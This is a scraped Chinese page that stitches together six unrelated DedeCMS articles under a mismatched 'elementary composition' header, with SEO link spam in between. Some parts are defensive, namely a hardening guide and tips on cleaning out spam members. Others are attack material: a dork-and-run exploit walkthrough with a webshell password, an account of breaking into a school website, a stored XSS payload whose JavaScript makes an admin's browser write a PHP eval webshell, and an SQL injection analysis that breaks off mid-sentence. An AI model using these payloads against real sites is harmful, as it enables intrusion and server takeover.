【 – 小学作文】
篇一:《dedecms v5.6 5.7后台会员功能漏洞解决思路》
很多DedeCMS用户难以解决的问题,是后台超多的垃圾企业会员问题。这个是很头疼的问题,因为DEDE删除会员没有全部删除或者选择多个删除功能。所以很多网站有成百上千个垃圾会员,而且每天都发一些垃圾文章,若不及时删除可能被搜索引擎收录。
不管是dedecms v5.6,还是dedecms v5.7,实际上都面临着这样的问题,如果拒绝会员注册,那么会减少很多会员投稿的可能性;如果不拒绝,有可能让垃圾文章泛滥。
个人比较看好的解决思路是,如果只是希望做简单的资讯站,那么删除会员功能即可,不用考虑会员注册发布文章什么的;若会员实在有什么文章要发布,那么可以让对方发送邮件什么的,这样基本上可以拒绝垃圾文章,自己保证每篇文章都是有质量的。
除开删除会员功能,还可以通过下面的方法获得更好的用户体验;好比我的网站/,首先要通过后台登陆到网站,选择系统栏目,选择会员设置。
一 会员权限设置
登陆DED后台——选择系统栏目——然后点击会员设置(如图)
找到会员使用权限开通状态这栏,DEDE默认选择是0,注册会员能发布文章。修改成-10或者-1就可以了 我建议修改成-1。这样以后淘宝网女装的垃圾会员不能发表垃圾文章了。
二:删除全部垃圾会员:虽然谁可以先审核会员然后才让发文章 但是当你每天看到很多垃圾会员存在你网站会员系统中时,而且很容易漏点一些正规注册的会员。
方法如下:登陆DEDE—然后点击系统设置—再然后SQL命令行工具如图
然后跟里面输入代码: select * from dede_member 查询数据库会员表。
delete from dede_member where mtype='企业' 按照企业字段删除会员表数据。 这个其实就是SQL 只要你找到表中各各属性字段就可以随意删除数据了。
如果是普通的垃圾会员,不是企业会员,那么不必这么折腾,可以直接删除即可。
Dedecms系列产品的漏洞很多,若非必要,不要用这个系统组成用户交互式的网站;好比你要做用户可以投稿的网站,实际上用discuz会更好,那个系统现在维护人员很多,相应的网站安全性会有更多的保证。Dedecms目前的官方维护人员日益减少啊!
另外,dedecms目前已有很长时间未发布新版本,预计是资金缘故,不知道咋回事啊!
篇二:《dede5.5最新漏洞利用图解》
dede5.5最新漏洞利用图解
google:powerd by DedeCMSV55_GBK
找到目标站
然后 运行
dedeexp t a r g e t /
出现错误的时候会这样提示
一句话连接 密码是t
济宁SEO推荐文章:
济宁SEO教你通过网站优化赚钱 什么是linkwheel?济宁SEO带你认识linkwheel
济宁SEO谷歌排名第一位 济宁SEO分享一篇不错的文章,不看后悔!
SEO知识摸底检验 网站优化常用的SEO推广技巧
什么是静态 URL 或动态 URL? 网站SEO优化的目的
js弹窗转向被搜索引擎定性为作弊 如何看待做黑链的网站?
做黑链的优势和劣势 网站被挂了木马和黑链怎么办?
济宁SEO给新人站长的一点建议! 企业网站优化成功案例分析
黑帽SEO如何挂黑链,挂黑链方法总结 Discuz! 7.2 注入漏洞分析与利用
dede5.5最新漏洞利用图解 网站优化之浅谈SEO
济宁SEO随着外链增多网站排名逐渐上升
篇三:《简单突破织梦找不到后台和漏洞的情况》
关于网站后台找不到的问题
今天给大家带来一个关于dedecms 一个入侵的思路
起因:
一朋友让我帮忙检测一个网站
呵呵学校网站,大家可不要搞破坏检测下 我已经通知管理了……
(一) 首先拿过这个站我的思路是先到处点击一下看看是什么系统的。
我首先点击了下边的学院简介
(二) 然后发现是织梦的系统好了我们可以尝试一下织梦一些默认漏洞
(三) 也可以拿起神器搞我直接上了御剑哈哈哈哈哈哈……
发现东西真不少 点击几个发现果真是织梦不过做了很多修改关闭了会员
我上网搜了很多织梦漏洞尝试了都不行这可把我愁坏了……………………
后来发现御剑了有一个目录!
**/**.inc 哈哈会不会直接读出来呢?
点开看一
下
哈哈我们继续看看这里边有什么
找啊找终于找到了
!
好了现在该找后台了,到这里思路堵死了那是各种工具各种社工也没找到
后来回头又看了一下这个 **.Inc发现哈哈原来在这里
哈哈好了直接进在网站目录下加上/djmanage/content_list.php转跳到
是不是很熟悉呵呵
成功进
入
然后再拿shell
好吧算了吧呵呵毕竟学校网站监测一下就好和大家分享一下也方便我个人记忆谢谢大家 我qq 873688134 欢迎交流学习 来什么刷钻 卡盟 刷墙的抓紧一边去
篇四:《有效防止DEDECMS被入侵的5个有效方法》
有效防止DEDECMS被入侵的5个有效方法
在国内的CMS中,用织梦DEDECMS作为建站内核的网站很多很多,其中有中型的企业网站,有小型的个人网站,也有更多的垃圾内容网站。使用人数越多,其安全性尤其需要重视。经常在论坛看到有些站长说自己的网站被挂马,数据被删除,更多的应该是被挂黑链接。今天下午的时候我们公司的网站就被挂黑链接,负责网站推广的同事在检测友情链接的时候看到有不明的SF链接,然后通过源代码看到被挂了大量的黑链接。
导致这样的原因有很多种,比如是服务器安全问题,也可能是网站程序漏洞问题。鉴于此分析并整理关于DEDECMS的安全维护,提出有效防止DEDECMS被入侵的5个有效方法。
第一,服务器安全。我 们大部分站长都是用的虚拟主机,有些人说这我们没有办法去选择和解决,我认为这个还是可以解决的。我们在购买主机的时候,可以试用几天,一般主机商都是可 以提供试用服务的,也或者要求主机商提供销售主机的IP给我们,我们可以通过同IP网站以及相关网站来分析目前服务器中的网站安全情况,如果你发现很多网站都被挂有黑链接,那说明服务器安全有一定的问题,选择的时候慎重考虑。
第二,程序的安全设置。我们需要根据织梦官方的设置要求,不要开放所有文件及文件夹的读写权限,有些文件夹设置为只读状态,如果我们紧紧是用来做内容系统,而不让会员参与,我们可以删除MEMBER文件夹,因为很多安全都是通过会员的提权出现的。以及我们在程序安装完毕后,要删除install文件夹,在设置数据库密码以及账户密码的时候尽量复杂一些,采用数字,大小写字母,以及字符混合作为密码。网站后台路径把默认的DEDE修改成其他不容易猜测的。
第三,及时升级补丁。作为织梦官网,升级也是经常在做的,我们在登陆网站后台的时候,如果看到有升级提醒,需要及时升级文件,以防止因为没有升级造成漏洞入侵。一般常见的安全,官网会第一时间发现,并且提供补丁,这点如果我们及时做到,从网站角度考虑是没
有问题的。
第四,密码设置安全。不论是我们网站的密码还是数据库密码,或者是FTP登陆密码,我们都需要设置安全一些。一个主机商朋友告诉我,最近出了一款什么FTP密码扫描软件,可以直接扫出弱密码,直接通过管理员登陆修改网站。
第五,定期数据备份。关于网站的安全,备份肯定每个人都知道,每个人也都会去备份。可能开始做网站的时候还会认真定期备份,后面时间长了就忘记了,也懒得备份。等待网站出现问题 就后悔为什么没有备份。所以定期备份数据是任何网站都必须做的,比仅仅是DEDECMS,一般最好半个月或者一个月备份一次,根据自己网站数据和重要性。 有些主机商会帮助我们备份,比如一周备份一次,也有每天同步备份的,这就相当不错了。
以上5点建议,是我认为有效防止DEDECMS被入侵的5个有效方法,希望对大家有一个参考价值。
本文来自: 原创分享,转载注明出处,谢谢。
篇五:《Dedecms XSS系统最新漏洞》
Dedecms XSS系统最新漏洞
dedecms XSS 0day最新5.3-5.7所有版本,由于编辑器过滤不严,将导致恶意脚本运行。可getshell
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。 下面说说利用方法。
条件有2个:
1.开启注册
2.开启投稿
注册会员—-发表文章
内容填写:
<style>@im\port’\
新建XSS.Css
body{ background-image:url(‘javascript:document.write(“<script src=}
新建xss.js 内容为
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType(‘text/xml’);
}
} elseif(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP',
'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
xmlhttp=request;
function getFolder( url ){
obj = url.split(‘/’)
return obj[obj.length-2]
}
oUrl = top.location.href;
u = getFolder(oUrl);
add_admin();
function add_admin(){{dede,5.7漏洞}.
var url= “/”+u+”/sys_sql_query.php”;
var params =”fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=%3C%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++”;
xmlhttp.open(“POST”, url, true);
xmlhttp.setRequestHeader(“Content-type”,
“application/x-
xmlhttp.setRequestHeader(“Content-length”, params.length); xmlhttp.setRequestHeader(“Connection”, “Keep-Alive”);
xmlhttp.send(params);
}
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
篇六:《【法客周年庆】dedecms v5.7 feedback.php 注入分析》
Dedecms v5.7 feedbac.php注入分析
该漏洞是cyg07在乌云提交的, 漏洞文件: plus\feedback.php。 存在问题的代码:
…
if($comtype == 'comments')
{
$arctitle = addslashes($title);
if($msg!='')
{//$typeid变量未做初始化
$inquery = "INSERT INTO
`#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,
`mid`,`bad`,`good`,`ftype`,`face`,`msg`)
VALUES ('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime', '{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg'); ";
echo $inquery;//调试,输出查询语句
$rs = $dsql->ExecuteNoneQuery($inquery);
if(!$rs)
{
ShowMsg(' 发表评论错误! ', '-1');
//echo $dsql->GetError();
exit();
}
}{dede,5.7漏洞}.
}
//引用回复
elseif ($comtype == 'reply')
{
$row = $dsql->GetOne("SELECT * FROM `#@__feedback` WHERE id ='$fid'"); $arctitle = $row['arctitle'];
$aid =$row['aid'];
$msg = $quotemsg.$msg;
$msg = HtmlReplace($msg, 2);
$inquery = "INSERT INTO
`#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)
VALUES
('$aid','$typeid','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')";
$dsql->ExecuteNoneQuery($inquery);
}
完整的输入语句,第二个参数 typeid可控。
INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`) VALUES ('108','2','游客
','paxmac','127.0.0.1','1','1351774092', '0','0','0','feedback','0','nsfocus&&paxmac team');
想要利用注入,